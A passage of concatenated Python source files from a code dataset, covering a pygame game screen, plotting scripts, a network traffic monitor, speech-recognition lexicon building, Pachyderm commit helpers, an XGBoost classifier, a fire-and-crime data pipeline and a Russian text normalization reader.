прошло выбор сделан, то отправляем этот выбор\n else:\n pygame.time.wait(1000) # Если нет, то останвливаем время дальше, чтобы не потерять события в игре\n k = 0\n k += 1\n pygame.display.flip()\n clock.tick(FPS)\n\n\ndef end_screen(won, lesson_number, falcon_mode, function_for_choice_mode_screen):\n \"\"\"Функция для обработки конца игры\n won - показатель победы\"\"\"\n global music\n pygame.mouse.set_visible(True)\n sp = []\n if won:\n intro_text = [\"Вы победили\"]\n else:\n intro_text = [\"Вы проиграли\"]\n intro_text.append(\"К уровням\")\n intro_text.append(\"Главное меню\")\n if won and lesson_number != 3: # Если уровень третий, то следущего уровня нет\n intro_text.append('К следующему уровню')\n else:\n intro_text.append('Повторить попытку')\n if won: # Музыка победы\n pygame.mixer_music.load(sounds['won_theme'])\n pygame.mixer_music.play(-1)\n pygame.mixer_music.set_volume(0.6)\n else: # Музыка поражения\n pygame.mixer_music.load(sounds['lose_theme'])\n pygame.mixer_music.play(-1)\n music = 0\n screen.fill((0, 0, 0))\n Fon(-400, -200, fon_group, 3)\n fon_group.draw(screen)\n font = pygame.font.Font(None, 50)\n text_coord = [(100, 100), (130, 300), (95, 350)]\n if won and lesson_number != 3: # В зависимости от длины слова меняется координата\n text_coord.append((30, 250))\n else:\n text_coord.append((60, 250))\n for line in range(len(intro_text)): # Загрузка текста\n string_rendered = font.render(intro_text[line], 1, pygame.Color('white'))\n intro_rect = string_rendered.get_rect()\n intro_rect.top = text_coord[line][1]\n intro_rect.x = text_coord[line][0]\n sp.append(intro_rect)\n screen.blit(string_rendered, intro_rect)\n button_for_lessons = sp[1] # Переход к уровням\n button_for_main = sp[2] # Переход к главному меню\n button_for_next_lesson = sp[3] # Переход к повтору или следующему уровню\n # Зависит от прохождения уровня\n while True: # Обработка действий пользователя\n for event in pygame.event.get():\n if event.type == pygame.QUIT: # Выход\n terminate()\n elif event.type == pygame.MOUSEBUTTONDOWN: # Нажатие на кнопки\n if button_for_lessons.collidepoint(event.pos):\n return display_lessons(falcon_mode, function_for_choice_mode_screen)\n if button_for_main.collidepoint(event.pos):\n return start_screen(function_for_choice_mode_screen, falcon_mode)\n if button_for_next_lesson.collidepoint(event.pos):\n # Используем втор��й случай display_lessons с переходом на другой уровень без выбора пользователя\n if not won or lesson_number == 3:\n return display_lessons(falcon_mode, function_for_choice_mode_screen, lesson_number)\n else:\n return display_lessons(falcon_mode, function_for_choice_mode_screen, lesson_number + 1)\n pygame.display.flip()\n clock.tick(FPS)\n","sub_path":"levels.py","file_name":"levels.py","file_ext":"py","file_size_in_byte":17464,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"111543989","text":"import json\nimport matplotlib as mpl\nimport matplotlib.pyplot as plt\n\nimport numpy as np\n\n\n\nratio_news = []\nratio_news_1level = []\nratio_ustop200 = []\nratio_ustop200_1level = []\n\nwith open('site_network_news_t.json','r') as f:\n stat = json.load(f)\nfor site, time in stat.items():\n ratio_news.append(time['ad_plus_inherited_ratio'])\n\nwith open('site_network_news_1level_t.json','r') as f:\n stat = json.load(f)\nfor site, time in stat.items():\n ratio_news_1level.append(time['ad_plus_inherited_ratio'])\n\nwith open('site_network_ustop200_t.json','r') as f:\n stat = json.load(f)\nfor site, time in stat.items():\n ratio_ustop200.append(time['ad_plus_inherited_ratio'])\n\nwith open('site_network_ustop200_1level_t.json','r') as f:\n stat = json.load(f)\nfor site, time in stat.items():\n ratio_ustop200_1level.append(time['ad_plus_inherited_ratio'])\n\nn_bins = 10000 \nfig, ax = plt.subplots()\nplt.xticks(np.arange(0, 1.1, step=0.1))\nplt.yticks(np.arange(0, 1.1, step=0.1))\nplt.grid(b=True, which='major', color='gray', linestyle='-', alpha=0.2)\nplt.grid(b=True, which='minor', color='gray', linestyle='-', alpha=0.2)\n\nn, bins, patches = plt.hist(ratio_news, n_bins, density=True, histtype='step',\n cumulative=True, label='News (landing)', range=(0, 1))\n\nn, bins, patches = plt.hist(ratio_news_1level, n_bins, density=True, histtype='step',\n cumulative=True, label='News (post-click)', range=(0, 1))\n\nn, bins, patches = plt.hist(ratio_ustop200, n_bins, density=True, histtype='step',\n cumulative=True, label='General (landing)', range=(0, 1))\n\nn, bins, patches = plt.hist(ratio_ustop200_1level, n_bins, density=True, histtype='step',\n cumulative=True, label='General (post-click)', range=(0, 1))\n\nplt.xlabel('Network Cost Ratio of Ads')\nplt.ylabel('Fraction of Websites')\nplt.title('Ads Network Cost (CDF)') \nplt.legend(loc='lower right')\n\naxpolygons = [poly for poly in ax.get_children() if isinstance(poly, mpl.patches.Polygon)]\nfor poly in axpolygons:\n poly.set_xy(poly.get_xy()[:-1])\n\nplt.savefig('network_cost_cdf', format='pdf')\nplt.show()\n","sub_path":"plot/site_ad_network_ratio/plotter.py","file_name":"plotter.py","file_ext":"py","file_size_in_byte":2146,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"189578501","text":"from time import time\n\nclass Bytes(float):\n\n def __new__(cls, val):\n return float.__new__(cls, val)\n\n def __sub__(self, other):\n return Bytes(float.__sub__(self, other))\n\n def __div__(self, other):\n return Bytes(float.__div__(self, other))\n\n @property\n def kib(self):\n return self / 1024\n\n @property\n def mib(self):\n return self / 1024 ** 2\n\nclass Traffic(object):\n\n def __init__(self, interface, download, upload):\n self.interface = interface\n self.download = download\n self.upload = upload\n\n def __sub__(self, other):\n download_delta = self.download - other.download\n upload_delta = self.upload - other.upload\n return (download_delta, upload_delta)\n\nclass NetworkMonitor(object):\n\n def __init__(self, interface):\n self.interface = interface\n\n self.download_total = 0\n self.upload_total = 0\n self.download_per_sec = 0\n self.upload_per_sec = 0\n\n self.last_updated = time()\n self.traffic = Traffic(interface, 0, 0)\n\n def _parse_traffic(self):\n with open('/proc/net/dev', 'r') as file_:\n interfaces = file_.readlines()[2:] #ignore header\n\n for interface in interfaces:\n interface = interface.split()\n name, download = interface[:2]\n upload = interface[9]\n name = name.replace(':', '')\n\n if name == self.interface:\n return Traffic(name, Bytes(download), Bytes(upload))\n\n def update(self):\n traffic = self._parse_traffic()\n now = time()\n\n download_delta, upload_delta = traffic - self.traffic\n time_delta = now - self.last_updated\n\n self.download_total = traffic.download\n self.upload_total = traffic.upload\n self.download_per_sec = download_delta / time_delta\n self.upload_per_sec = upload_delta / time_delta\n\n self.traffic = traffic\n self.last_updated = now\n","sub_path":"src/org.cream.melange.NetworkMonitorWidget/network.py","file_name":"network.py","file_ext":"py","file_size_in_byte":1983,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"479422621","text":"def roznorodnosc(il_boh, poziomy):\n wyk = 0\n pop = []\n for poziom in poziomy:\n if poziom - 1 not in pop:\n poziomy[wyk] -= 1\n pop.append(poziom - 1)\n elif poziom not in pop:\n pop.append(poziom)\n elif poziom + 1 not in pop:\n poziomy[wyk] += 1\n pop.append(poziom + 1)\n return len(pop)\n\n\ndef main():\n n = int(input())\n p = [int(i) for i in input().split()].sort()\n assert n == len(p)\n print(roznorodnosc(n, p))\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"oij/python/zad_prob_a/zad_prob_a.py","file_name":"zad_prob_a.py","file_ext":"py","file_size_in_byte":547,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"17626801","text":"__author__ = 'bingham'\nimport os\nimport sys\n\nsys.path.append(os.path.abspath(os.path.dirname(__file__) + '/' + '..'))\n\nimport code.data_process.user_based_collaborative_filtering as ubcf\nimport code.data_format.random_split_data as rsd\nimport code.data_analyse.result_plot as rp\n\ndef recall(train_list, test_list, user_similarity, user_artname_dict, k = 3, N = 5):\n hit = 0\n all = 0\n for i in range(len(train_list)):\n user = train_list[i][0][0]\n tu = test_list[i]\n rank = ubcf.get_recommendation(user, user_similarity, user_artname_dict, k, N)\n for item in rank.keys():\n if [user, item] in tu:\n hit += 1\n all += len(tu)\n return hit / (all * 1.0)\n\ndef precision(train_list, test_list, user_similarity, user_artname_dict, k = 3, N = 5):\n hit = 0\n all = 0\n for i in range(len(train_list)):\n user = train_list[i][0][0]\n tu = test_list[i]\n rank = ubcf.get_recommendation(user, user_similarity, user_artname_dict, k, N)\n for item in rank.keys():\n if [user, item] in tu:\n hit += 1\n all += N\n return hit / (all * 1.0)\n\nif __name__ == '__main__':\n\n train_list, test_list = rsd.split_all_users()\n\n user_artname_dict = ubcf.build_user_artname_dict_by_train_list(train_list)\n user_similarity = ubcf.calculate_user_similarity(user_artname_dict)\n\n N = 5\n recall_list = []\n precision_list = []\n for k in range(1, 20):\n recall_result = recall(train_list, test_list, user_similarity, user_artname_dict, k, N) * 100\n precision_result = precision(train_list, test_list, user_similarity, user_artname_dict, k, N) * 100\n recall_list.append((k, recall_result))\n precision_list.append((k, precision_result))\n\n # print precision_list\n\n rp.show_plot_for_list(recall_list)\n\n\n\n","sub_path":"code/data_analyse/recommendation_result_evaluation.py","file_name":"recommendation_result_evaluation.py","file_ext":"py","file_size_in_byte":1851,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"612497245","text":"#!/usr/bin/env python3\n\"\"\"\nFilename: S1_createhotWordLexiconUnigram \nAuthor: Chng Eng Siong\nDate: 31 July 2021\nLast edited: 28 Aug 2021 (CES), 11:07pm\n\n# This library supports the reading a unigram count file generated by ngram-count\n# it assumes 2 fields, 1 left field == string, right field == count\n# we will not assume anything else, and the string can be non-english words.\n# we will remove ALL non-english entries, and resort.\n\"\"\"\n\nimport os, sys, io\nimport logging\nimport json \nimport argparse\n\nsys.path.append('./local')\nfrom libWord import C_WordList, C_OneWord\nfrom libWordCount import C_WordSortedCountDict, C_WordUnSortedCountDict\nimport subprocess\n\n\nlogging.basicConfig(\n format='%(asctime)s,%(msecs)d %(name)s %(levelname)s [%(filename)s:%(lineno)d] %(message)s',\n datefmt='%H:%M:%S',\n level=logging.INFO)\nlog = logging.getLogger(\"{}\".format(os.path.basename(sys.argv[0])))\n\n\ndef wordIsRomanChars(w):\n return w[0].upper() and all([ord(c) <128 or (ord(c) >= 65313 and ord(c) <= 65339) or (ord(c) >= 65345 and ord(c) <= 65371) for c in w])\n\n\n\ndef HWLG_fromMaster(config,opDir, unigram_master, hotwordRawList, opHotDecoderUnigram, opHotDecoderLexicon):\n \n log.info(\"{}\".format('S1: HWLG_fromMaster: Creating HotWord Decoder LG from Master unigramcount'))\n select_SqrtUnigramCount = config['HWLG_fromMaster']['select_SqrtUnigramCount']\n useTopN_MasterWord = config['HWLG_fromMaster']['useTopN_MasterWord']\n threshold_N_forCountHotWord = config['HWLG_fromMaster']['threshold_N_forCountHotWord']\n # parameters to use:\n print(select_SqrtUnigramCount, useTopN_MasterWord,threshold_N_forCountHotWord)\n\n myMasterCount = C_WordSortedCountDict()\n myMasterCount.readUnigramCount( unigram_master,useTopN_MasterWord) # reading topN entries\n foundTok = myMasterCount.dictSortedIdxToStr[threshold_N_forCountHotWord-1]\n foundCountThreshold = myMasterCount.dictStrToSortedCount[foundTok]\n opStr = \"read unigramcount, Threshold for hotword \"+ str(foundCountThreshold)\n log.info(\"{}\".format(opStr))\n\n # Lets read the hot word first\n listWord = C_WordList()\n \n listWord.read_WordList(hotwordRawList,True)\n # we must use above class, as we need the label of the hotword in __Tanjong_Pagar_Way\n # we must pass it a flag to tell read_WordList if or if not hotWord\n myHotWordCount = C_WordUnSortedCountDict()\n for oneWordStr in listWord.listWordStr:\n oneWord = listWord.dictWStrToCWord[oneWordStr]\n countPron = 0\n for pronStr in oneWord.wordArrayPron: \n if countPron == 0:\n myHotWordCount.addWordCount(oneWord.wordLabel, foundCountThreshold)\n countPron = countPron+1\n else:\n # This is for multiple pronunciation using #1, #2, .. etc\n myHotWordCount.addWordCount(oneWord.wordLabel+'#'+str(countPron), foundCountThreshold)\n countPron=countPron+1\n\n #inserting the hotword and label into the myHotWordCount\n opStr = \"completed constructing myHotWordCount hotwords :\"\n log.info(\"{}\".format(opStr))\n \n listOfWordToAdd = ['','','','','']\n for oneWordStr in listOfWordToAdd:\n myHotWordCount.addWordCount(oneWordStr , foundCountThreshold)\n\n\n if config['HWLG_fromMaster']['select_SqrtUnigramCount'] == 1:\n #sqrt root the count\n print('SQRT change in count')\n myMasterCount.SqrtRootCount()\n myHotWordCount.SqrtRootCount()\n\n\n if config['HWLG_fromMaster']['select_SqrtUnigramCount'] == 0:\n print('no change in count')\n pass\n\n\n # here we save the count files \n myMasterCount.SaveFile(opHotDecoderUnigram,'w')\n myHotWordCount.SaveFile(opHotDecoderUnigram,'a')\n\n # here we save the lexicon\n list_englishWordsUnigram = sorted(set(myMasterCount.dictStrToSortedCount.keys()))\n listWord.add_WordList( list_englishWordsUnigram, False) #MUST set second entry to False it is NOT a hotword\n listWord.write_WordLexicon(opHotDecoderLexicon)\n\n opStr = \"completed creating hotwordDecoderUnigram.txt and hotwordDecoderLex.txt in \"+opDir\n log.info(\"{}\".format(opStr))\n\n\n\ndef HWLG_fromBPE():\n log.info(\"{}\".format('Creating HotWord Decoder LG from BPEWord'))\n # We have NOT implemented this yet\n # die\n\n\n\n# This function will create in OpDir/config_LG\n# The lexicon and count for hotword decoder\n\ndef real_main(ipJsonFileName): \n\n log.info(\"{}\".format(\"S1_createhotWordLexiconUnigram.py: creating the hotword decoder's lexicon and LMcount from Master with settings\"))\n with open(ipJsonFileName, mode=\"r\") as j_object:\n config = json.load(j_object)\n # Lets check the required directories\n log.info(\"{}\".format(\"model=\"+config['model_name']))\n\n exptInfo=config['ExptInfo']['HWLG']\n log.info(\"{}\".format(\"creating the experiment using:\"+exptInfo))\n\n exptDir=config['ExptInfo']['exptDir']\n inputDir=config['ExptInfo']['inputDir'].replace('$exptDir',exptDir)\n outputDir=config['ExptInfo']['outputDir'].replace('$exptDir',exptDir)\n dataLGDir=config['ExptInfo']['dataLGDir'].replace('$exptDir',exptDir)\n\n masterDir=config['MasterDecoder']['masterDir'] \n unigram_master = config['MasterDecoder']['unigram_master'].replace('$masterDir',masterDir)\n hotwordRawList = config['ExptInfo']['ipHotWordList']\n\n opHotDecoderUnigram = dataLGDir+'/'+config['dataLGDir']['hwUnigram_txt']\n opHotDecoderUnigramArpa = dataLGDir+'/'+config['dataLGDir']['hwUnigram_arpa']\n opHotDecoderUnigramArpa_gzip = dataLGDir+'/'+config['dataLGDir']['hwUnigram_arpa_gz']\n opHotDecoderLexicon = dataLGDir+'/'+config['dataLGDir']['hwLex']\n\n if (exptInfo == 'HWLG_fromMaster'):\n HWLG_fromMaster(config,exptDir, unigram_master, hotwordRawList, opHotDecoderUnigram,opHotDecoderLexicon)\n\n if (exptInfo == 'HWLG_fromBPE'):\n HWLG_fromBPE(config)\n\n\n ngram_cmd = config['KaldiDir']['SRILM_ROOT']+'/ngram-count' \n\n result1 = subprocess.Popen([ngram_cmd, '-read', opHotDecoderUnigram ,'-lm',opHotDecoderUnigramArpa ])\n result1.wait()\n print(result1)\n\n opCmdStr = 'gzip -c '+opHotDecoderUnigramArpa+' > '+opHotDecoderUnigramArpa_gzip \n print('execute:'+opCmdStr)\n os.system(opCmdStr)\n\n\ndef main():\n parse = argparse.ArgumentParser()\n parse.add_argument('--json', required=True, help=\"json file to setup experiment\")\n args = parse.parse_args()\n real_main(args.json)\n \nif __name__ == \"__main__\":\n main()\n","sub_path":"S1_createhotWordLexiconUnigram.py","file_name":"S1_createhotWordLexiconUnigram.py","file_ext":"py","file_size_in_byte":6523,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"653478142","text":"import os\nimport logging\n\nfrom pymongo import MongoClient\n\nBASE_DIR = os.path.dirname(os.path.abspath(__file__))\n\nmongo = MongoClient(\"mongodb://localhost:27017\")\ndb = mongo['aircode']\ncol = db['shopnt_prod']\n\nlogging.basicConfig(\n format='%(message)s',\n filename='crawler/shopnt/unknown.txt', level=logging.INFO)\n\nn_unk = 0\nn_known = 0\n\nwith open(os.path.join(BASE_DIR, 'unknowndata_201223.txt'), 'r') as f:\n data = f.readlines()\n for row in data:\n prod_id = row.strip()\n result = list(col.find({'prod_id':prod_id}))\n if result:\n # for d in result:\n # print(f\"{d['prod_id']}\\t{d['prod_name']}\")\n # logging.info(f\"{d['prod_id']}\\t{d['prod_name']}\")\n n_known += 1\n else:\n n_unk += 1\n logging.info(f'{prod_id}')\n\nprint(\"known\", n_known)\nprint(\"unk\", n_unk)","sub_path":"shopnt/find_unknown.py","file_name":"find_unknown.py","file_ext":"py","file_size_in_byte":868,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"353162445","text":"import re\nfrom typing import NamedTuple, Union\n\nfrom python_pachyderm.proto.v2.pfs import pfs_pb2\n\n\n# copied from pachyderm/pachyderm\nvalid_branch_re = re.compile(r\"^[a-zA-Z0-9_-]+$\")\nuuid_re = re.compile(r\"[0-9a-f]{12}4[0-9a-f]{19}\")\n\n\nclass Commit(NamedTuple):\n repo: str\n branch: str = None\n id: str = None\n repo_type: str = \"user\"\n\n \"\"\"A namedtuple subclass to specify a Commit.\"\"\"\n\n def to_pb(self) -> pfs_pb2.Commit:\n \"\"\"Converts itself into a `pfs_pb2.Commit`\"\"\"\n return pfs_pb2.Commit(\n id=self.id,\n branch=pfs_pb2.Branch(\n repo=pfs_pb2.Repo(name=self.repo, type=self.repo_type), name=self.branch\n ),\n )\n\n @staticmethod\n def from_pb(commit: pfs_pb2.Commit) -> \"Commit\":\n return Commit(\n repo=commit.branch.repo.name,\n branch=commit.branch.name,\n id=commit.id,\n repo_type=commit.branch.repo.type,\n )\n\n\ndef commit_from(\n commit: Union[tuple, dict, Commit, pfs_pb2.Commit] = None,\n) -> pfs_pb2.Commit:\n \"\"\"A commit can be identified by [repo, repo_type, branch, commit_id]\n\n Helper function to convert objects that represent a Commit query into a\n protobuf Commit object.\n \"\"\"\n if isinstance(commit, pfs_pb2.Commit):\n return commit\n if isinstance(commit, Commit):\n return commit.to_pb()\n if isinstance(commit, tuple):\n repo, branch, commit_id, repo_type = None, None, None, \"user\"\n if len(commit) == 2:\n repo, branch_or_commit = commit\n if uuid_re.match(branch_or_commit) or not valid_branch_re.match(\n branch_or_commit\n ):\n commit_id = branch_or_commit\n else:\n branch = branch_or_commit\n elif len(commit) == 3:\n repo, branch, commit_id = commit\n else:\n repo, branch, commit_id, repo_type = commit\n return Commit(\n repo=repo, branch=branch, id=commit_id, repo_type=repo_type\n ).to_pb()\n if isinstance(commit, dict):\n return Commit(**commit).to_pb()\n if commit is None:\n return None\n\n raise TypeError(\"Please provide a tuple, dict, or Commit object\")\n","sub_path":"src/python_pachyderm/pfs.py","file_name":"pfs.py","file_ext":"py","file_size_in_byte":2231,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"23196860","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Nov 7 16:19:59 2017\n\n@author: Dane\n\"\"\"\n\nimport pandas as pd\nfrom scipy import sparse\nimport os\n\n# Set the working directory for the project\nos.chdir('C://Users/Dane/Documents/GitHub/seis735_project/')\n\n####################################################################\n## Step 1: Prepare the training data and test data\n####################################################################\n\n# Read the training data\ndf_train = pd.read_csv('data/interim/train_freq.gz', compression='gzip', encoding='ISO-8859-1')\n\n# Keep only the predictors\ndf_train.drop(['ID','Gene','Variation'], inplace=True, axis=1)\n\n# Convert predictors to matrix format\nx_train = sparse.csr_matrix(df_train.as_matrix()[:,1:])\ny_train = df_train.as_matrix()[:,0]\n\n# Cleanup\ndel df_train\n\n# Read the test data\ndf_test = pd.read_csv('data/interim/test_freq.gz', compression='gzip', encoding='ISO-8859-1')\n\n# Keep only the predictors\ndf_test.drop(['ID','Gene','Variation'], inplace=True, axis=1)\n\n# Convert predictors to matrix format\nx_test = sparse.csr_matrix(df_test.as_matrix()[:,1:])\ny_test = df_test.as_matrix()[:,0]\n\n# Cleanup\ndel df_test\n\n########################################################################\n## Step 2: Dimensionality reduction\n########################################################################\n\nfrom sklearn.decomposition import TruncatedSVD\nimport matplotlib.pyplot as plt\nimport numpy as np\n\n# Train the model\nsvd = TruncatedSVD(n_components=1000, n_iter=20, random_state=42)\nsvd.fit(x_train)\n\n# Get the explained variance\nvar = svd.explained_variance_\nprint(np.sum(var))\n\n# Plot the variance\nplt.plot(var)\nplt.ylabel('Explained Variance')\nplt.show()\n\n# Transform the data (reduce the dimensions)\nx_train_red = svd.transform(x_train)\nx_test_red = svd.transform(x_test)\n\n####################################################################\n## Step 3: Create and train the model\n####################################################################\n\nfrom xgboost import XGBClassifier\n\n# Initialize the model parameters\nxgb = XGBClassifier(learning_rate=0.333,\n max_depth=4,\n n_estimators=2000,\n objective='multi:softprob',\n eval_metric='mlogloss',\n num_class=9,\n n_jobs=-1\n )\n\n# Train the model\nxgb.fit(x_train_red,\n y_train,\n verbose=True,\n early_stopping_rounds=50,\n eval_set=[(x_train_red, y_train), (x_test_red, y_test)]\n )\n\n# Make the predictions\npreds = xgb.predict(x_test_red)\nprobs = xgb.predict_proba(x_test_red)\n\n####################################################################\n## Step 3: Evaluate the model\n####################################################################\n\nfrom sklearn.metrics import confusion_matrix\nimport itertools\n\ndef plot_confusion_matrix(cm, classes,normalize=False,title='Confusion matrix',cmap=plt.cm.Blues):\n if normalize:\n cm = cm.astype('float') / cm.sum(axis=1)[:, np.newaxis]\n print(\"Normalized confusion matrix\")\n else:\n print('Confusion matrix, without normalization')\n\n plt.imshow(cm, interpolation='nearest', cmap=cmap)\n plt.title(title)\n plt.colorbar()\n tick_marks = np.arange(len(classes))\n plt.xticks(tick_marks, classes, rotation=45)\n plt.yticks(tick_marks, classes)\n\n fmt = '.2f' if normalize else 'd'\n thresh = cm.max() / 2.\n for i, j in itertools.product(range(cm.shape[0]), range(cm.shape[1])):\n plt.text(j, i, format(cm[i, j], fmt),\n horizontalalignment=\"center\",\n color=\"white\" if cm[i, j] > thresh else \"black\")\n\n plt.tight_layout()\n plt.ylabel('True label')\n plt.xlabel('Predicted label')\n\n# Create the confusion matrix\ncm = confusion_matrix(y_test, preds, labels=[1,2,3,4,5,6,7,8,9])\n\n# Calculate accuracy\nacc = np.sum(np.diag(cm)) / np.sum(cm)\nprint('Accuracy: %0.5f' % acc)\n\n# Plot non-normalized confusion matrix\nplt.figure()\nplot_confusion_matrix(cm, classes=[1,2,3,4,5,6,7,8,9],\n title='Confusion matrix, without normalization')\nplt.show()\n\n####################################################################\n## Step 4: Save the model\n####################################################################\n\nimport pickle\n\n# Save the SVD model\nwith open('models/svd_500_v1.pickle', 'wb') as handle:\n pickle.dump(svd, handle, protocol=pickle.HIGHEST_PROTOCOL)\n \n# Save the xgb model\nwith open('models/xgboost_v1.pickle', 'wb') as handle:\n pickle.dump(xgb, handle, protocol=pickle.HIGHEST_PROTOCOL)\n\n","sub_path":"src/modeling/xgboost_svd.py","file_name":"xgboost_svd.py","file_ext":"py","file_size_in_byte":4613,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"417540979","text":"from fire_and_smoke import *\nfrom crime import *\n\n# Fire & smoke params\nshape_path = 'test-firecrime/data/oper/newhms/output/'\nurl = 'https://satepsanone.nesdis.noaa.gov/pub/volcano/FIRE/HMS_ARCHIVE/2018/GIS/{}/hms_{}{}.zip'\nsink_path=\"test-firecrime\"\n\n# Crime params\nclient = Socrata(\"moto.data.socrata.com\",None)\ndf_socrata_key = \"p6kq-vsa3\"\ncolumns_list = ['incident_datetime','incident_type_primary','parent_incident_type','state','city','latitude','longitude']\n\n# Date\nstart_date = '2018-07-01'\nend_date = '2018-07-31'\ndate_range = build_date_range(start_date, end_date)\n\ndf_list = [] \n\nfor date in date_range:\n # Smoke df\n extract_geo_shape(url,sink_path, date, dataset='smoke')\n smoke = create_geo_df(date, shape_path, dataset='smoke')\n # Select density and geometry\n smoke = smoke[['Density', 'geometry']]\n\n # Fire df\n # ESRI:102009 North America Lambert Conformal Conic (unit is in meters, good for North America)\n meters_crs='+proj=lcc +lat_1=20 +lat_2=60 +lat_0=40 +lon_0=-96 +x_0=0 +y_0=0 +datum=NAD83 +units=m +no_defs'\n extract_geo_shape(url,sink_path, date, dataset='fire')\n fire = create_geo_df(date,shape_path, dataset='fire')\n fire = fire.to_crs(meters_crs)\n\n # Crime df\n crimes = create_crime_df(df_socrata_key, columns_list, date)\n crime_by_city = create_crime_by_date_city_df(crimes)\n\n # Cities df\n cities = create_cities_df(crimes)\n cities = assign_geom_cities(cities, crs = {'init':'epsg:4326'})\n\n # Spatial join between cities and smoke\n cities_smoke = gpd.sjoin(cities, smoke, how='left',op=\"within\")\n\n #Cities in meters crs\n cities = cities.to_crs(meters_crs)\n cities = create_city_buffer(cities,buffer_radius=50000)\n\n # Spatial join between cities and fires\n cities_fire = gpd.sjoin(cities, fire, how='left')\n # Count fires\n cities_fire = count_fires_by_city(cities_fire)\n\n # Join crimes and smoke\n cities_smoke =pd.merge(crime_by_city, cities_smoke)\n # Final df\n final_df = pd.merge(cities_smoke, cities_fire)[['incident_date','parent_incident_type','crime_count','city','state','Density','fires_count']]\n \n print('Writing df for {}'.format(date))\n df_list.append(final_df)\n \n\ndf_list = pd.concat(df_list)\ndf_list.to_csv(\"df_test.csv\",index=False)","sub_path":"create_fire_crime_df.py","file_name":"create_fire_crime_df.py","file_ext":"py","file_size_in_byte":2276,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"149587484","text":"import os\nimport tqdm\nfrom nltk.stem.snowball import SnowballStemmer\nfrom natasha import Segmenter, Doc\n\n\ndef is_abbreviation(word):\n if (sum(1 for char in word if char.isupper()) / len(word)) >= 0.5:\n return True\n else:\n return False\n\n\ndef clean_entity(entry):\n # в документе 994383 был странный токен с *, поэтому на такой случай удаляем такие штуки,\n # иначе ошибка с размерностью\n entry = entry.replace('*', '')\n # документ 990538 Sputnik'ом разибвается на три токена, поэтому 'ом убираем\n # документ 927141 Ростова-на Дону -> Ростова-на-Дону\n # документ 1041141 Кара- оол -> Кара-оол\n if '’ом' in entry:\n entry = entry.replace('’ом', '')\n\n if '«' in entry:\n entry = entry.replace('«', '')\n\n if '»' in entry:\n entry = entry.replace('»', '')\n\n if '(' in entry:\n entry = entry.replace('(', '')\n\n if ')' in entry:\n entry = entry.replace(')', '')\n\n if entry == 'Ростова-на Дону':\n entry = 'Ростова-на-Дону'\n\n if entry == 'Кара- оол':\n entry = 'Кара-оол'\n\n return entry\n\n\n\nclass RuNormASReaderForSequenceTagging():\n def __init__(self):\n self.endings = []\n self.normalization_endings = []\n self.stemmer = SnowballStemmer('russian')\n self.symbols = ['«', '»', '(', ')', \"'\", '’']\n\n def read(self, text_filename, annotation_filename, normalization_filename):\n text = open(text_filename, 'r', encoding='utf-8').read()\n annotation = open(annotation_filename, 'r', encoding='utf-8').read().strip().split('\\n')\n normalization = open(normalization_filename, 'r', encoding='utf-8').read().strip().split('\\n')\n\n segmenter = Segmenter()\n\n doc_text = Doc(text)\n doc_text.segment(segmenter)\n\n entities = []\n number_of_entities_in_annotation = 0\n\n for line in annotation:\n if line != '\\n' or line != '':\n number_of_entities_in_annotation += 1\n\n spans = list(map(int, line.strip().split()))\n entry = ''\n\n while spans:\n start, stop = spans[0], spans[1]\n entry = text[start: stop] + ' '\n spans = spans[2:]\n\n entry = entry.strip()\n entry = clean_entity(entry)\n\n doc = Doc(entry)\n doc.segment(segmenter)\n\n entities += [doc.tokens]\n\n # print(len(entities), entities)\n\n normalized_entities = []\n for line in normalization:\n line.strip()\n entry = clean_entity(line)\n entry = Doc(entry)\n entry.segment(segmenter)\n normalized_entities += [entry.tokens]\n\n entities_stem = []\n norm_endings = []\n\n for entity, norm in zip(entities, normalized_entities):\n endings = []\n stems = []\n for token, token_norm in zip(entity, norm):\n stem = self.get_stem(token.text)\n ending = self.find_ending(token_norm.text, stem, is_normalization=True)\n stems.append(stem)\n endings.append(ending)\n entities_stem.append(stems)\n norm_endings.append(endings)\n\n\n #print(len(normalized_entities), normalized_entities)\n \"\"\"\n for idx in range(len(entities)):\n print(entities[idx], normalized_entities[idx])\"\"\"\n\n return entities_stem, norm_endings\n\n def get_stem(self, word):\n if is_abbreviation(word):\n return word\n else:\n word_stem = self.stemmer.stem(word)\n if word[0].isupper():\n word_stem = word_stem.capitalize()\n\n return word_stem\n\n # функция для получения окончаний слова\n def find_ending(self, norm, word, is_normalization=False):\n if is_abbreviation(norm):\n return ''\n else:\n word_stem = self.stemmer.stem(norm)\n if norm[0].isupper():\n word_stem = word_stem.capitalize()\n if norm == word:\n return ''\n else:\n ending = norm.replace(word_stem, '')\n\n if norm != ending:\n if is_normalization:\n self.normalization_endings.append(ending)\n else:\n self.endings.append(ending)\n return ending\n else:\n return ''\n\ndef collect_sentences_for_sequence_tagging():\n reader = RuNormASReaderForSequenceTagging()\n\n entities_train = []\n endings_train = []\n\n entities_eval = []\n endings_eval = []\n\n filenames = []\n for _, _, files in os.walk(\"../data/train_new/named/texts_and_ann\"):\n for filename in sorted(files):\n filenames.append(filename.split('.')[0])\n\n filenames = sorted(set(filenames), reverse=True)\n\n train = filenames[:2000]\n eval = filenames[2000:]\n\n\n for filename in tqdm.tqdm(train, total=len(train)):\n text_filename = \"data/train_new/named/texts_and_ann/\" + filename + \".txt\"\n annotation_filename = \"data/train_new/named/texts_and_ann/\" + filename + \".ann\"\n normalization_filename = \"data/train_new/named/norm/\" + filename + \".norm\"\n document_entities, document_normalization = reader.read(text_filename, annotation_filename, normalization_filename)\n\n if len(document_entities) != len(document_normalization):\n print(filename)\n 